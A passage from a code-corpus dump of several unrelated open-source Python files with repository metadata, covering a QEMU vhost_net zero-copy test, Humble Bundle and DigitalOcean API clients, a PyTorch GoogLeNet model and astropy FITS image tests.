1) Enable/Disable vhost_net zero copy in host
1) Boot the main vm.
3) Run the ping test, check guest nic works.
4) check vm is alive have no crash
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def zerocp_enable_status():
"""
Check whether host have enabled zero copy, if enabled return True,
else return False.
"""
def_para_path = "/sys/module/vhost_net/parameters/experimental_zcopytx"
para_path = params.get("zcp_set_path", def_para_path)
cmd_status = utils.system("grep 1 %s" % para_path, ignore_status=True)
if cmd_status:
return False
else:
return True
def enable_zerocopytx_in_host(enable=True):
"""
Enable or disable vhost_net zero copy in host
"""
cmd = "modprobe -rf vhost_net; "
if enable:
cmd += "modprobe vhost-net experimental_zcopytx=1"
else:
cmd += "modprobe vhost-net experimental_zcopytx=0"
if utils.system(cmd) or enable != zerocp_enable_status():
raise error.TestNAError("Set vhost_net zcopytx failed")
error.context("Set host vhost_net experimental_zcopytx", logging.info)
if params.get("enable_zerocp", 'yes') == 'yes':
enable_zerocopytx_in_host()
else:
enable_zerocopytx_in_host(False)
error.context("Boot vm with 'vhost=on'", logging.info)
params["vhost"] = "vhost=on"
params["start_vm"] = 'yes'
login_timeout = int(params.get("login_timeout", 360))
env_process.preprocess_vm(test, params, env, params.get("main_vm"))
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
guest_ip = vm.get_address()
error.context("Check guest nic is works by ping", logging.info)
status, output = utils_test.ping(guest_ip, count=10, timeout=20)
if status:
err_msg = "Run ping %s failed, after set zero copy" % guest_ip
raise error.TestError(err_msg)
elif utils_test.get_loss_ratio(output) == 100:
err_msg = "All packets lost during ping guest %s." % guest_ip
raise error.TestFail(err_msg)
# in vm.verify_alive will check whether have userspace or kernel crash
error.context("Check guest is alive and have no crash", logging.info)
vm.verify_alive()
|
ehabkost/tp-qemu
|
qemu/tests/zero_copy.py
|
Python
|
gpl-2.0
| 2,659
| 0
|
from __future__ import absolute_import
from collections import namedtuple
from django.conf import settings
from sentry.utils.dates import to_datetime
from sentry.utils.services import LazyServiceWrapper
from .backends.base import Backend # NOQA
from .backends.dummy import DummyBackend # NOQA
backend = LazyServiceWrapper(Backend, settings.SENTRY_DIGESTS,
settings.SENTRY_DIGESTS_OPTIONS,
(DummyBackend,))
backend.expose(locals())
class Record(namedtuple('Record', 'key value timestamp')):
@property
def datetime(self):
return to_datetime(self.timestamp)
ScheduleEntry = namedtuple('ScheduleEntry', 'key timestamp')
OPTIONS = frozenset((
'increment_delay',
'maximum_delay',
'minimum_delay',
))
def get_option_key(plugin, option):
assert option in OPTIONS
return 'digests:{}:{}'.format(plugin, option)
|
JackDanger/sentry
|
src/sentry/digests/__init__.py
|
Python
|
bsd-3-clause
| 910
| 0
|
"""
Handlers to process the responses from the Humble Bundle API
"""
__author__ = "Joel Pedraza"
__copyright__ = "Copyright 2014, Joel Pedraza"
__license__ = "MIT"
from humblebundle import exceptions
from humblebundle import models
import itertools
import requests
# Helper methods
def parse_data(response):
try:
return response.json()
except ValueError as e:
raise exceptions.HumbleParseException("Invalid JSON: %s", str(e),
request=response.request,
response=response)
def get_errors(data):
errors = data.get('errors', None)
error_msg = ", ".join(itertools.chain.from_iterable(v for k, v in errors.items())) \
if errors else "Unspecified error"
return errors, error_msg
def authenticated_response_helper(response, data):
# Successful API calls might not have a success property.
# It's not enough to check if it's falsy, as None is acceptable
success = data.get('success', None)
if success is True:
return True
error_id = data.get('error_id', None)
errors, error_msg = get_errors(data)
# API calls that require login and have a missing or invalid token
if error_id == 'login_required':
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response
)
# Something happened, we're not sure what but we hope the error_msg is
# useful
if success is False or errors is not None or error_id is not None:
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# Response had no success or errors fields, it's probably data
return True
# Response handlers
def login_handler(client, response):
""" login response always returns JSON """
data = parse_data(response)
success = data.get('success', None)
if success is True:
return True
captcha_required = data.get('captcha_required')
authy_required = data.get('authy_required')
errors, error_msg = get_errors(data)
if errors:
captcha = errors.get('captcha')
if captcha:
raise exceptions.HumbleCaptchaException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
username = errors.get('username')
if username:
raise exceptions.HumbleCredentialException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
authy_token = errors.get("authy-token")
if authy_token:
raise exceptions.HumbleTwoFactorException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
raise exceptions.HumbleAuthenticationException(
error_msg, request=response.request, response=response,
captcha_required=captcha_required, authy_required=authy_required
)
def gamekeys_handler(client, response):
""" get_gamekeys response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [v['gamekey'] for v in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_list_handler(client, response):
""" order_list response always returns JSON """
data = parse_data(response)
if isinstance(data, list):
return [models.Order(client, order) for order in data]
# Let the helper function raise any common exceptions
authenticated_response_helper(response, data)
# We didn't get a list, or an error message
raise exceptions.HumbleResponseException(
"Unexpected response body", request=response.request, response=response
)
def order_handler(client, response):
""" order response might be 404 with no body if not found """
if response.status_code == requests.codes.not_found:
raise exceptions.HumbleResponseException(
"Order not found", request=response.request, response=response
)
data = parse_data(response)
# The helper function should be sufficient to catch any other errors
if authenticated_response_helper(response, data):
return models.Order(client, data)
def claimed_entities_handler(client, response):
"""
claimed_entities response always returns JSON
returns parsed json dict
"""
data = parse_data(response)
# The helper function should be sufficient to catch any errors
if authenticated_response_helper(response, data):
return data
def sign_download_url_handler(client, response):
""" sign_download_url response always returns JSON """
data = parse_data(response)
# If the request is unauthorized (this includes invalid machine names) this
# response has it's own error syntax
errors = data.get('_errors', None)
message = data.get('_message', None)
if errors:
error_msg = "%s: %s" % (errors, message)
raise exceptions.HumbleResponseException(
error_msg, request=response.request, response=response
)
# If the user isn't signed in we get a "typical" error response
if authenticated_response_helper(response, data):
return data['signed_url']
def store_products_handler(client, response):
""" Takes a results from the store as JSON and converts it to object """
data = parse_data(response)
return [models.StoreProduct(client, result) for result in data['results']]
|
lutris/humblebundle-python
|
humblebundle/handlers.py
|
Python
|
mit
| 5,985
| 0.000668
|
__author__ = 'Varun Nayyar'
from Utils.MFCCArrayGen import emotions, speakers, getCorpus
from MCMC import MCMCRun
from emailAlerter import alertMe
def main2(numRuns = 100000, numMixtures = 8, speakerIndex = 6):
import time
for emotion in emotions:
start = time.ctime()
Xpoints = getCorpus(emotion, speakers[speakerIndex])
message = MCMCRun(Xpoints, emotion+"-"+speakers[speakerIndex], numRuns, numMixtures)
message += "Start time: {}\nEnd Time: {}\n".format(start, time.ctime())
message += "\nNumRuns: {}, numMixtures:{}\n ".format(numRuns, numMixtures)
message += "\nEmotion: {}, speaker:{}\n".format(emotion, speakers[speakerIndex])
alertMe(message)
if __name__ == "__main__":
for i in xrange(len(speakers)):
main2(numMixtures=8, speakerIndex=i)
|
nayyarv/MonteGMM
|
Inference/BayesInference.py
|
Python
|
mit
| 844
| 0.016588
|
default_app_config = 'user_deletion.apps.UserDeletionConfig'
|
incuna/django-user-deletion
|
user_deletion/__init__.py
|
Python
|
bsd-2-clause
| 61
| 0
|
'''GoogLeNet with PyTorch.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1,y2,y3,y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
|
2prime/DeepLab
|
ResNet/models/googlenet.py
|
Python
|
mit
| 3,237
| 0.001236
|
#!/usr/bin/env python
#coding: utf-8
"""
This module simply sends request to the Digital Ocean API,
and returns their response as a dict.
"""
import requests
API_ENDPOINT = 'https://api.digitalocean.com'
class DoError(RuntimeError):
pass
class DoManager(object):
def __init__(self, client_id, api_key):
self.client_id = client_id
self.api_key = api_key
def all_active_droplets(self):
json = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
json.pop('status', None)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
def restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params= {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/new/' % domain_id, params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but actually it 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = port
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
return self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
def request(self, path, params={}, method='GET'):
params['client_id'] = self.client_id
params['api_key'] = self.api_key
if not path.startswith('/'):
path = '/'+path
url = API_ENDPOINT+path
try:
resp = requests.get(url, params=params, timeout=60)
json = resp.json()
except ValueError: # requests.models.json.JSONDecodeError
raise ValueError("The API server doesn't respond with a valid json")
except requests.RequestException as e: # errors from requests
raise RuntimeError(e)
if resp.status_code != requests.codes.ok:
if json:
if 'error_message' in json:
raise DoError(json['error_message'])
elif 'message' in json:
raise DoError(json['message'])
# The JSON reponse is bad, so raise an exception with the HTTP status
resp.raise_for_status()
if json.get('status') != 'OK':
raise DoError(json['error_message'])
return json
if __name__=='__main__':
import os
client_id = os.environ['DO_CLIENT_ID']
api_key = os.environ['DO_API_KEY']
do = DoManager(client_id, api_key)
import sys
fname = sys.argv[1]
import pprint
# size_id: 66, image_id: 1601, region_id: 1
pprint.pprint(getattr(do, fname)(*sys.argv[2:]))
|
chuwy/dopy
|
dopy/manager.py
|
Python
|
mit
| 9,514
| 0.003363
|
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import math
import os
import re
import time
import warnings
import pytest
import numpy as np
from numpy.testing import assert_equal
from astropy.io import fits
from astropy.tests.helper import catch_warnings, ignore_warnings
from astropy.io.fits.hdu.compressed import SUBTRACTIVE_DITHER_1, DITHER_SEED_CHECKSUM
from .test_table import comparerecords
from . import FitsTestCase
try:
import scipy # noqa
except ImportError:
HAS_SCIPY = False
else:
HAS_SCIPY = True
class TestImageFunctions(FitsTestCase):
def test_constructor_name_arg(self):
"""Like the test of the same name in test_table.py"""
hdu = fits.ImageHDU()
assert hdu.name == ''
assert 'EXTNAME' not in hdu.header
hdu.name = 'FOO'
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# Passing name to constructor
hdu = fits.ImageHDU(name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
# And overriding a header with a different extname
hdr = fits.Header()
hdr['EXTNAME'] = 'EVENTS'
hdu = fits.ImageHDU(header=hdr, name='FOO')
assert hdu.name == 'FOO'
assert hdu.header['EXTNAME'] == 'FOO'
def test_constructor_ver_arg(self):
def assert_ver_is(hdu, reference_ver):
assert hdu.ver == reference_ver
assert hdu.header['EXTVER'] == reference_ver
hdu = fits.ImageHDU()
assert hdu.ver == 1 # defaults to 1
assert 'EXTVER' not in hdu.header
hdu.ver = 1
assert_ver_is(hdu, 1)
# Passing name to constructor
hdu = fits.ImageHDU(ver=2)
assert_ver_is(hdu, 2)
# And overriding a header with a different extver
hdr = fits.Header()
hdr['EXTVER'] = 3
hdu = fits.ImageHDU(header=hdr, ver=4)
assert_ver_is(hdu, 4)
# The header card is not overridden if ver is None or not passed in
hdr = fits.Header()
hdr['EXTVER'] = 5
hdu = fits.ImageHDU(header=hdr, ver=None)
assert_ver_is(hdu, 5)
hdu = fits.ImageHDU(header=hdr)
assert_ver_is(hdu, 5)
def test_constructor_copies_header(self):
"""
Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/153
Ensure that a header from one HDU is copied when used to initialize new
HDU.
"""
ifd = fits.HDUList(fits.PrimaryHDU())
phdr = ifd[0].header
phdr['FILENAME'] = 'labq01i3q_rawtag.fits'
primary_hdu = fits.PrimaryHDU(header=phdr)
ofd = fits.HDUList(primary_hdu)
ofd[0].header['FILENAME'] = 'labq01i3q_flt.fits'
# Original header should be unchanged
assert phdr['FILENAME'] == 'labq01i3q_rawtag.fits'
def test_open(self):
# The function "open" reads a FITS file into an HDUList object. There
# are three modes to open: "readonly" (the default), "append", and
# "update".
# Open a file read-only (the default mode), the content of the FITS
# file are read into memory.
r = fits.open(self.data('test0.fits')) # readonly
# data parts are latent instantiation, so if we close the HDUList
# without touching data, data can not be accessed.
r.close()
with pytest.raises(IndexError) as exc_info:
r[1].data[:2, :2]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
def test_open_2(self):
r = fits.open(self.data('test0.fits'))
info = ([(0, 'PRIMARY', 1, 'PrimaryHDU', 138, (), '', '')] +
[(x, 'SCI', x, 'ImageHDU', 61, (40, 40), 'int16', '')
for x in range(1, 5)])
try:
assert r.info(output=False) == info
finally:
r.close()
def test_open_3(self):
# Test that HDUs cannot be accessed after the file was closed
r = fits.open(self.data('test0.fits'))
r.close()
with pytest.raises(IndexError) as exc_info:
r[1]
# Check that the exception message is the enhanced version, not the
# default message from list.__getitem__
assert str(exc_info.value) == ('HDU not found, possibly because the index '
'is out of range, or because the file was '
'closed before all HDUs were read')
# Test that HDUs can be accessed with lazy_load_hdus=False
r = fits.open(self.data('test0.fits'), lazy_load_hdus=False)
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
with pytest.raises(IndexError) as exc_info:
r[6]
assert str(exc_info.value) == 'list index out of range'
# And the same with the global config item
assert fits.conf.lazy_load_hdus # True by default
fits.conf.lazy_load_hdus = False
try:
r = fits.open(self.data('test0.fits'))
r.close()
assert isinstance(r[1], fits.ImageHDU)
assert len(r) == 5
finally:
fits.conf.lazy_load_hdus = True
def test_fortran_array(self):
# Test that files are being correctly written+read for "C" and "F" order arrays
a = np.arange(21).reshape(3,7)
b = np.asfortranarray(a)
afits = self.temp('a_str.fits')
bfits = self.temp('b_str.fits')
# writting to str specified files
fits.PrimaryHDU(data=a).writeto(afits)
fits.PrimaryHDU(data=b).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a)
np.testing.assert_array_equal(fits.getdata(bfits), a)
# writting to fileobjs
aafits = self.temp('a_fileobj.fits')
bbfits = self.temp('b_fileobj.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a)
np.testing.assert_array_equal(fits.getdata(bbfits), a)
def test_fortran_array_non_contiguous(self):
# Test that files are being correctly written+read for 'C' and 'F' order arrays
a = np.arange(105).reshape(3,5,7)
b = np.asfortranarray(a)
# writting to str specified files
afits = self.temp('a_str_slice.fits')
bfits = self.temp('b_str_slice.fits')
fits.PrimaryHDU(data=a[::2, ::2]).writeto(afits)
fits.PrimaryHDU(data=b[::2, ::2]).writeto(bfits)
np.testing.assert_array_equal(fits.getdata(afits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bfits), a[::2, ::2])
# writting to fileobjs
aafits = self.temp('a_fileobj_slice.fits')
bbfits = self.temp('b_fileobj_slice.fits')
with open(aafits, mode='wb') as fd:
fits.PrimaryHDU(data=a[::2, ::2]).writeto(fd)
with open(bbfits, mode='wb') as fd:
fits.PrimaryHDU(data=b[::2, ::2]).writeto(fd)
np.testing.assert_array_equal(fits.getdata(aafits), a[::2, ::2])
np.testing.assert_array_equal(fits.getdata(bbfits), a[::2, ::2])
def test_primary_with_extname(self):
"""Regression test for https://aeon.stsci.edu/ssb/trac/pyfits/ticket/151
Tests that the EXTNAME keyword works with Primary HDUs as well, and
interacts properly with the .name attribute. For convenience
hdulist['PRIMARY'] will still refer to the first HDU even if it has an
EXTNAME not equal to 'PRIMARY'.
"""
prihdr = fits.Header([('EXTNAME', 'XPRIMARY'), ('EXTVER', 1)])
hdul = fits.HDUList([fits.PrimaryHDU(header=prihdr)])
assert 'EXTNAME' in hdul[0].header
assert hdul[0].name == 'XPRIMARY'
assert hdul[0].name == hdul[0].header['EXTNAME']
info = [(0, 'XPRIMARY', 1, 'PrimaryHDU', 5, (), '', '')]
assert hdul.info(output=False) == info
assert hdul['PRIMARY'] is hdul['XPRIMARY']
assert hdul['PRIMARY'] is hdul[('XPRIMARY', 1)]
hdul[0].name = 'XPRIMARY2'
assert hdul[0].header['EXTNAME'] == 'XPRIMARY2'
hdul.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert hdul[0].name == 'XPRIMARY2'
# This test used to fail on Windows - if it fails again in future, see
# https://github.com/astropy/astropy/issues/5797
# The warning appears on Windows but cannot be explicitly caught.
@pytest.mark.filterwarnings("ignore:Assigning the 'data' attribute is an "
"inherently unsafe operation")
def test_io_manipulation(self):
# Get a keyword value. An extension can be referred by name or by
# number. Both extension and keyword names are case insensitive.
with fits.open(self.data('test0.fits')) as r:
assert r['primary'].header['naxis'] == 0
assert r[0].header['naxis'] == 0
# If there are more than one extension with the same EXTNAME value,
# the EXTVER can be used (as the second argument) to distinguish
# the extension.
assert r['sci', 1].header['detector'] == 1
# append (using "update()") a new card
r[0].header['xxx'] = 1.234e56
assert ('\n'.join(str(x) for x in r[0].header.cards[-3:]) ==
"EXPFLAG = 'NORMAL ' / Exposure interruption indicator \n"
"FILENAME= 'vtest3.fits' / File name \n"
"XXX = 1.234E+56 ")
# rename a keyword
r[0].header.rename_keyword('filename', 'fname')
pytest.raises(ValueError, r[0].header.rename_keyword, 'fname',
'history')
pytest.raises(ValueError, r[0].header.rename_keyword, 'fname',
'simple')
r[0].header.rename_keyword('fname', 'filename')
# get a subsection of data
assert np.array_equal(r[2].data[:3, :3],
np.array([[349, 349, 348],
[349, 349, 347],
[347, 350, 349]], dtype=np.int16))
# We can create a new FITS file by opening a new file with "append"
# mode.
with fits.open(self.temp('test_new.fits'), mode='append') as n:
# Append the primary header and the 2nd extension to the new
# file.
n.append(r[0])
n.append(r[2])
# The flush method will write the current HDUList object back
# to the newly created file on disk. The HDUList is still open
# and can be further operated.
n.flush()
assert n[1].data[1, 1] == 349
# modify a data point
n[1].data[1, 1] = 99
# When the file is closed, the most recent additions of
# extension(s) since last flush() will be appended, but any HDU
# already existed at the last flush will not be modified
del n
# If an existing file is opened with "append" mode, like the
# readonly mode, the HDU's will be read into the HDUList which can
# be modified in memory but can not be written back to the original
# file. A file opened with append mode can only add new HDU's.
os.rename(self.temp('test_new.fits'),
self.temp('test_append.fits'))
with fits.open(self.temp('test_append.fits'), mode='append') as a:
# The above change did not take effect since this was made
# after the flush().
assert a[1].data[1, 1] == 349
a.append(r[1])
del a
# When changes are made to an HDUList which was opened with
# "update" mode, they will be written back to the original file
# when a flush/close is called.
os.rename(self.temp('test_append.fits'),
self.temp('test_update.fits'))
with fits.open(self.temp('test_update.fits'), mode='update') as u:
# When the changes do not alter the size structures of the
# original (or since last flush) HDUList, the changes are
# written back "in place".
assert u[0].header['rootname'] == 'U2EQ0201T'
u[0].header['rootname'] = 'abc'
assert u[1].data[1, 1] == 349
u[1].data[1, 1] = 99
u.flush()
# If the changes affect the size structure, e.g. adding or
# deleting HDU(s), header was expanded or reduced beyond
# existing number of blocks (2880 bytes in each block), or
# change the data size, the HDUList is written to a temporary
# file, the original file is deleted, and the temporary file is
# renamed to the original file name and reopened in the update
# mode. To a user, these two kinds of updating writeback seem
# to be the same, unless the optional argument in flush or
# close is set to 1.
del u[2]
u.flush()
# The write method in HDUList class writes the current HDUList,
# with all changes made up to now, to a new file. This method
# works the same disregard the mode the HDUList was opened
# with.
u.append(r[3])
u.writeto(self.temp('test_new.fits'))
del u
# Another useful new HDUList method is readall. It will "touch" the
# data parts in all HDUs, so even if the HDUList is closed, we can
# still operate on the data.
with fits.open(self.data('test0.fits')) as r:
r.readall()
assert r[1].data[1, 1] == 315
# create an HDU with data only
data = np.ones((3, 5), dtype=np.float32)
hdu = fits.ImageHDU(data=data, name='SCI')
assert np.array_equal(hdu.data,
np.array([[1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1.]],
dtype=np.float32))
# create an HDU with header and data
# notice that the header has the right NAXIS's since it is constructed
# with ImageHDU
hdu2 = fits.ImageHDU(header=r[1].header, data=np.array([1, 2],
dtype='int32'))
assert ('\n'.join(str(x) for x in hdu2.header.cards[1:5]) ==
"BITPIX = 32 / array data type \n"
"NAXIS = 1 / number of array dimensions \n"
"NAXIS1 = 2 \n"
"PCOUNT = 0 / number of parameters ")
def test_memory_mapping(self):
# memory mapping
f1 = fits.open(self.data('test0.fits'), memmap=1)
f1.close()
def test_verification_on_output(self):
# verification on output
# make a defect HDUList first
x = fits.ImageHDU()
hdu = fits.HDUList(x) # HDUList can take a list or one single HDU
with catch_warnings() as w:
hdu.verify()
text = "HDUList's 0th element is not a primary HDU."
assert len(w) == 3
assert text in str(w[1].message)
with catch_warnings() as w:
hdu.writeto(self.temp('test_new2.fits'), 'fix')
text = ("HDUList's 0th element is not a primary HDU. "
"Fixed by inserting one as 0th HDU.")
assert len(w) == 3
assert text in str(w[1].message)
def test_section(self):
# section testing
fs = fits.open(self.data('arange.fits'))
assert np.array_equal(fs[0].section[3, 2, 5], 357)
assert np.array_equal(
fs[0].section[3, 2, :],
np.array([352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362]))
assert np.array_equal(fs[0].section[3, 2, 4:],
np.array([356, 357, 358, 359, 360, 361, 362]))
assert np.array_equal(fs[0].section[3, 2, :8],
np.array([352, 353, 354, 355, 356, 357, 358, 359]))
assert np.array_equal(fs[0].section[3, 2, -8:8],
np.array([355, 356, 357, 358, 359]))
assert np.array_equal(
fs[0].section[3, 2:5, :],
np.array([[352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362],
[363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373],
[374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384]]))
assert np.array_equal(fs[0].section[3, :, :][:3, :3],
np.array([[330, 331, 332],
[341, 342, 343],
[352, 353, 354]]))
dat = fs[0].data
assert np.array_equal(fs[0].section[3, 2:5, :8], dat[3, 2:5, :8])
assert np.array_equal(fs[0].section[3, 2:5, 3], dat[3, 2:5, 3])
assert np.array_equal(fs[0].section[3:6, :, :][:3, :3, :3],
np.array([[[330, 331, 332],
[341, 342, 343],
[352, 353, 354]],
[[440, 441, 442],
[451, 452, 453],
[462, 463, 464]],
[[550, 551, 552],
[561, 562, 563],
[572, 573, 574]]]))
assert np.array_equal(fs[0].section[:, :, :][:3, :2, :2],
np.array([[[0, 1],
[11, 12]],
[[110, 111],
[121, 122]],
[[220, 221],
[231, 232]]]))
